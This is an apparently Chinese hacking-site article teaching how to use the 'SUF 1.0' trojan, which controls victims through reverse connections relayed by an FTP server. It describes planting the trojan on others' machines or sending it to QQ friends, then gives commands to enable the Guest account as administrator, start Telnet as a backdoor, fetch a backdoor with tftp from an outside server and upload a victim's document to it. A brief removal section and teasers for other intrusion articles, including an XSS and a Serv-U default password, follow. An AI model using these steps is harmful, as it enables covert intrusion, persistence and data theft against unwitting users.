网络入侵也玩双通道

所属分类: 网络安全 / 黑客入侵 阅读数: 156
收藏 0 赞 0 分享
一个14岁的男孩经过无数次的实验,推出了一款全新的木马——SUF 1.0,该后门运用了“反弹端口原理”与“FTP 隧道技术”,也就是两台机器不直接传输数据,而是利用第三台机器(FTP服务器)来交换数据.
  SUF(Shell Use Ftp)顾名思义,就是通过FTP的Shell。这种奇妙的思路真叫绝的,它充分利用防火墙“外严内不严”的漏洞,客户端生成服务端后,把客户端主机的IP发送到FTP里,然后别人运行服务端后下载IP文件,然后通过反向连接,使客户端知道服务端上线,然后把要执行的命令发送到FTP里,服务端再读取FTP里要执行的命令,最后完成执行。
  说了这么一大堆,SUF是不是真的有这么厉害?用事实来说明一切,跟我来……
  一、摩拳擦掌——配置服务端
  和一般的木马后门大体相同,首先将下载下来的SUF 1.0解压缩,双击运行其中的client.exe,出现主窗口,非常简洁明了吧!点击“配置服务端”按钮,弹出了配置对话窗口,这里仅需要配置一下FTP服务选项。在“FTP”栏中填入一个有写权限的FTP服务器,如:Ftp.abc.com或者220.202.242.98。接着在“端口”栏中填写好FTP服务器端口,默认为21。再在“用户名”和“密码”栏中输入FTP帐户名称和密码,点击“配置服务器”,出现一提示对话框,点击“确定”,这时程序就会开始验证FTP服务器,验证成功后请选择木马服务端(server.exe)的路径,最后完成配置。
  小提示:如果要给服务端加壳,请在配置服务端之前给服务端(server.exe)加壳,服务端是可重复配置的。同时一定要确保使用的FTP帐户对FTP服务器有写的权限。
二、玩弄骨掌——轻松来控制
  接下来是玩木马后门必不可少的环节,那就是种植木马。种植木马的方法、途径有很多,以前也专门有文章介绍过,大家可以发挥自己的聪明才智,把服务端上传到肉鸡或者发给QQ好友等,当服务端程序被运行后,一般的使用者很难感觉到计算机有异常,防火墙也不会出现报警。其实,一只黑手正在慢慢靠近,服务端程序会自动从FTP服务器中获取客户端的IP地址,然后开始反向连接,这时服务端计算机的IP地址就会出现在客户端的“上线列表”中。
  小提示:客户端计算机必须是直接连接到Internet,而不能是处于内网中,同时,如果开启了防火墙的话,请打开5915端口。
  在“上线列表”中双击某一在线计算机的IP(例如:220.202.242.100),出现“连接到220.202.242.100”对话窗口,这就已经得到了目标计算机的一个系统权限的Shell,现在想干什么就自由发挥吧!
  想想既然是送上门的肉鸡,还是留个后门,以便日后再次光顾吧!这里就将Guest帐户激活,并提升为管理员,再开启目标计算机的Telnet服务,下面就看如何来实现?请输入命令:net user guest /active:yes,点击“运行”来激活Guest帐户,再运行命令:net localgroup administrators guest /add,将Guest加入管理员组,最后再运行命令:net start telnet,开启目标计算机的远程登录服务。
  其实,在这里有很多东东可以应用的,比如可以通过FTP命令或者TFTP来远程下载/上传文件。这里假设已经知道有一个TFTP服务器220.202.242.99,我们从服务器上下载一个后门程序Sy.exe,只要运行命令:tftp 220.202.242.99 get sy.exe;要把肉鸡上的一个数据文档Ccash.doc上传到TFTP服务器只要运行命令:tftp 220.202.242.99 put Ccash.doc。
  小提示:Windows自身附带了一个简单的文件上传下载程序Tftp.exe,可要建立TFTP服务器,就得借助TFTPD32了。
  三、摆脱控制——隔离隧道
  虽然SUF 1.0的实现方法非常隐蔽,可还是能够将其剿灭的,可以借助Active Ports(下载地址:http://www.ldcatv.com/soft/aports.rar)等端口实时监测工具来发现、中止它。如果中了SUF后门,就可在“Active Ports”主窗口中发现两个server.exe进程,其中一个通过4319端口与FTP服务器进行通讯,另一个通过4321端口与客户端计算机进行通讯。选择它们,再点击“Terminate Process”来结束进程。然后在资源管理器中将server.exe删除,这样就摆脱了SUF的控制。
更多精彩内容其他人还在看

对有防火墙主机的入侵渗透

一、踩点 ping [url=http://www.xxx.com]www.xxx.com[/url] 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。 二、注入 从源文件里搜索关键字asp,
收藏 0 赞 0 分享

浅谈入侵UNIX

一:基本知识 1:常见UNIX版本: SCO UNIX,Sunos,Solaris,HP-UX,Digtal,Unix,IRIX,AIX,Linux,FreeBSD, 386BSD,A/UX,BSD,BSD-LITE,Goherent,Dynix,Hurd(GNN)
收藏 0 赞 0 分享

全方位了解黑客如何入侵NT系统

现在的企业当中一般都是使用的NT系统,也不得不承认,NT系统的确是非常适合企业使用的操作系统,然而“黑客”的攻击引来了企业信息安全危机…… 得到了NT的管理员密码还能做什么,还不是想做什么就做什么呗。但到底能做什么呢?能详
收藏 0 赞 0 分享

入侵Oracle数据库时常用的操作命令整理

本文按步骤讲解如何入侵Oracle数据库时常用的操作命令整理。 1、su–Oracle不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。 2、sqlplus /nolog 或sqlplus system/manager 或./sq
收藏 0 赞 0 分享

通杀动易2005的 XSS 攻击

动易2005里面,留言的时候存在一个XSS。 攻击方法如下 : 首先在网站注册一个普通会员,然后去GUESTBOOK留言,在插入图片的时候地址写上(建议在原代码里面把图片的高度与宽度都设置成0,这样在图片前面加上这个连接,基本上就看不见图片了,图片的连接却被管理员解吸
收藏 0 赞 0 分享

Serv-u6.0提权新招

适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。 限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用MSWins
收藏 0 赞 0 分享

DNS(域名服务器)欺骗技术

概述:什么是DNS欺骗? DNS欺骗是一门改变DNS原始指向IP的艺术。为了更好的理解,让我们先来看一个例子。如果你想用浏览器去google搜索一些信息,毫无疑问的你会在地址栏里输入www.google.com的网址然后回车。 那么在这背后又有什么事情正在进行着呢?一般而
收藏 0 赞 0 分享

用“电驴”抓肉鸡

我用“电驴”抓肉鸡!!难道是放一个“电驴”在路上,等“火鸡”过来,一不小心踩在“电驴”上结果给烫熟了,结果就成“肉鸡”了。很多朋友说抓肉鸡很难,找好肉鸡就更难,
收藏 0 赞 0 分享

轻松学会入侵网络服务器

尽管为服务器设计软件的软件工程师们想方设法提高系统的安全性,然而由于系统管理员的水平参差不齐或安全意识底下,往往给黑客提供了入侵的机会。   其实每一个黑客都有自己独到的方法。笔者对于入侵网站服务器的资料收集了很多,但是因为实际情况的不同,往往
收藏 0 赞 0 分享

139/445端口与入侵win 2000主机

SMB(Server Message Block),Windows协议族,用于文件和打印共享服务。在Win9X/NT中SMB基于NBT实现,NBT(NetBIOS over TCP/IP)使用137, 138 (UDP) and 139 (TCP)来实现基于TCP/IP的NETB
收藏 0 赞 0 分享
查看更多